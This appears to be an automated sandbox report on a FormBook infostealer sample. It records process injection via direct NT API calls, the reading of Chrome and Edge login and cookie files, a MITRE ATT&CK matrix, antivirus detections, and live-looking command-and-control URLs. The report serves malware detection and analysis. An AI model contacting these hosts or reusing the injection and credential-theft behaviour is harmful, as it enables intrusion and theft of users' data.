              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015806F1 mov eax, dword ptr fs:[00000030h]0_2_015806F1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015806F1 mov eax, dword ptr fs:[00000030h]0_2_015806F1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504690 mov eax, dword ptr fs:[00000030h]0_2_01504690
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504690 mov eax, dword ptr fs:[00000030h]0_2_01504690
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015366B0 mov eax, dword ptr fs:[00000030h]0_2_015366B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153C6A6 mov eax, dword ptr fs:[00000030h]0_2_0153C6A6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4940 mov eax, dword ptr fs:[00000030h]0_2_015D4940
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01580946 mov eax, dword ptr fs:[00000030h]0_2_01580946
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A4978 mov eax, dword ptr fs:[00000030h]0_2_015A4978
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A4978 mov eax, dword ptr fs:[00000030h]0_2_015A4978
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C97C mov eax, dword ptr fs:[00000030h]0_2_0158C97C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01526962 mov eax, dword ptr fs:[00000030h]0_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E mov eax, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E mov edx, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E mov eax, dword ptr fs:[00000030h]0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C912 mov eax, dword ptr fs:[00000030h]0_2_0158C912
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8918 mov eax, dword ptr fs:[00000030h]0_2_014F8918
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8918 mov eax, dword ptr fs:[00000030h]0_2_014F8918
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E908 mov eax, dword ptr fs:[00000030h]0_2_0157E908
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E908 mov eax, dword ptr fs:[00000030h]0_2_0157E908
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158892A mov eax, dword ptr fs:[00000030h]0_2_0158892A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0159892B mov eax, dword ptr fs:[00000030h]0_2_0159892B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A9D0 mov eax, dword ptr fs:[00000030h]0_2_0150A9D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015349D0 mov eax, dword ptr fs:[00000030h]0_2_015349D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CA9D3 mov eax, dword ptr fs:[00000030h]0_2_015CA9D3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015969C0 mov eax, dword ptr fs:[00000030h]0_2_015969C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015329F9 mov eax, dword ptr fs:[00000030h]0_2_015329F9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015329F9 mov eax, dword ptr fs:[00000030h]0_2_015329F9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E9E0 mov eax, dword ptr fs:[00000030h]0_2_0158E9E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015889B3 mov esi, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015889B3 mov eax, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015889B3 mov eax, dword ptr fs:[00000030h]0_2_015889B3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A0 mov eax, dword ptr fs:[00000030h]0_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015009AD mov eax, dword ptr fs:[00000030h]0_2_015009AD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015009AD mov eax, dword ptr fs:[00000030h]0_2_015009AD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01530854 mov eax, dword ptr fs:[00000030h]0_2_01530854
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504859 mov eax, dword ptr fs:[00000030h]0_2_01504859
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504859 mov eax, dword ptr fs:[00000030h]0_2_01504859
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01512840 mov ecx, dword ptr fs:[00000030h]0_2_01512840
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596870 mov eax, dword ptr fs:[00000030h]0_2_01596870
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596870 mov eax, dword ptr fs:[00000030h]0_2_01596870
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E872 mov eax, dword ptr fs:[00000030h]0_2_0158E872
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158E872 mov eax, dword ptr fs:[00000030h]0_2_0158E872
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158C810 mov eax, dword ptr fs:[00000030h]0_2_0158C810
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A483A mov eax, dword ptr fs:[00000030h]0_2_015A483A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A483A mov eax, dword ptr fs:[00000030h]0_2_015A483A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A830 mov eax, dword ptr fs:[00000030h]0_2_0153A830
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov ecx, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522835 mov eax, dword ptr fs:[00000030h]0_2_01522835
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E8C0 mov eax, dword ptr fs:[00000030h]0_2_0152E8C0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtCreateMutant: Direct from: 0x774635CC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtMapViewOfSection: Direct from: 0x77462D1C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtResumeThread: Direct from: 0x774636AC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtSetInformationProcess: Direct from: 0x77462C5C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtSetInformationThread: Direct from: 0x774563F9
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtProtectVirtualMemory: Direct from: 0x77457B2E
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtNotifyChangeKey: Direct from: 0x77463C2C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtQueryInformationProcess: Direct from: 0x77462C26
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtResumeThread: Direct from: 0x77462FBC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtReadFile: Direct from: 0x77462ADC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtQuerySystemInformation: Direct from: 0x77462DFC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtDelayExecution: Direct from: 0x77462DDC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtClose: Direct from: 0x77462B6C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtCreateUserProcess: Direct from: 0x7746371C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtWriteVirtualMemory: Direct from: 0x7746490C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtQuerySystemInformation: Direct from: 0x774648CC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtReadVirtualMemory: Direct from: 0x77462E8C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtCreateKey: Direct from: 0x77462C6C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtSetInformationThread: Direct from: 0x77462B4C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtQueryAttributesFile: Direct from: 0x77462E6C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtOpenSection: Direct from: 0x77462E0C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtCreateFile: Direct from: 0x77462FEC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtOpenFile: Direct from: 0x77462DCC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtQueryInformationToken: Direct from: 0x77462CAC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtTerminateThread: Direct from: 0x77462FCC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe NtOpenKeyEx: Direct from: 0x77462B9C
              Source: C:\Users\user\Desktop\New Order#12125.exe Section loaded: NULL target: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\New Order#12125.exe Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe protection: read write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe Thread register set: target process: 8060
              Source: C:\Windows\SysWOW64\fc.exe Thread APC queued: target process: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

              Stealing of Sensitive Information

              Source: Yara match File source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match File source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | New Order#12125.exe | 66% | Virustotal | | Browse |
              | New Order#12125.exe | 71% | ReversingLabs | Win32.Backdoor.FormBook | |
              | New Order#12125.exe | 100% | Avira | TR/Crypt.ZPACK.Gen | |
              | New Order#12125.exe | 100% | Joe Sandbox ML | | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.gayhxi.info/k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLoh100%Avira URL Cloudmalware
              http://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg==0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/?60q4=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK8besZipepVANv+t7hBu9DYDfOtNcbRzWTW+UxqRkwAygg==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/?XxGx=INH0eLoh&60q4=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+9x4X9y8Z/5Ky7IaWcKrL+RZ/80JfAgkwuEz7OkyFGBk9g==0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?60q4=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acut6Rdyu+TCEGVVLJHlB4H68wm+9nMwlD43slzfYSOf5Syg==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://www.moyu19.pro0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/100%Avira URL Cloudmalware
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/?60q4=d8Ky6hmePKhU2XxCZcorJpWfFstOvl7w2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdGjvy0c7sWjSWanGPqhflfgeWepWZ17tVEIX5zsWYbAgUQ==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1to0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/0%Avira URL Cloudsafe
